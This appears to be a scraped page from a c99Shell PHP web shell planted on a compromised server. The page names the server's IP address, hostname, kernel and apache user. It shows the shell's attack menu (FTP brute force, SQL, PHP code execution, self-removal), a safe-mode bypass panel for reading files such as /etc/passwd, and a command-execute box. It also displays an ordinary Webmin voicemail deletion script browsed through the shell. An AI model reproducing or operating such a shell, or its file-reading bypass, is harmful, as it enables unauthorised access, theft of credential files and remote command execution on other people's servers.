110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/vgetty/ drwxr-xr-x Free 49.58 GB of 127.8 GB (38.8%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/libexec/webmin/vgetty/ drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# delete.cgi
# Delete a bunch of voicemail messages

require './vgetty-lib.pl';
&ReadParse();
@conf = &get_config();
$mdir = &messages_dir(\@conf);
@del = split(/\0/, $in{'del'});
$index = &messages_index(\@conf);
&lock_file($index);
open(INDEX, $index);
@index = map { chomp; $_ } <INDEX>;
close(INDEX);
if (!@index) {
    $bak = &find_value("backup_message", \@conf);
    push(@index, $bak) if (-r "$mdir/$bak");
    }
if ($in{'move'}) {
    $rdir = &receive_dir(\@conf);
    foreach $f (@del) {
        $f =~ /\.\./ && &error($text{'delete_efile'});
        rename("$rdir/$f", "$mdir/$f");
        }
    push(@index, @del);
    &open_tempfile(INDEX, ">$index");
    &print_tempfile(INDEX, map { "$_\n" } @index);
    &close_tempfile(INDEX);
    &unlock_file($index);
    &webmin_log("move", undef, undef, { 'del' => \@del });
    &redirect("list_received.cgi");
    }
else {
    $dir = $in{'mode'} ? &messages_dir(\@conf) : &receive_dir(\@conf);
    foreach $f (@del) {
        $f =~ /\.\./ && &error($text{'delete_efile'});
        unlink("$dir/$f");
        }
    if ($in{'mode'}) {
        @index = grep { &indexof($_, @del) < 0 } @index;
        &open_tempfile(INDEX, ">$index");
        &print_tempfile(INDEX, map { "$_\n" } @index);
        &close_tempfile(INDEX);
        }
    &unlock_file($index);
    &webmin_log("delete", $in{'mode'}, undef, { 'del' => \@del });
    &redirect($in{'mode'} ? "list_messages.cgi" : "list_received.cgi");
    }

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: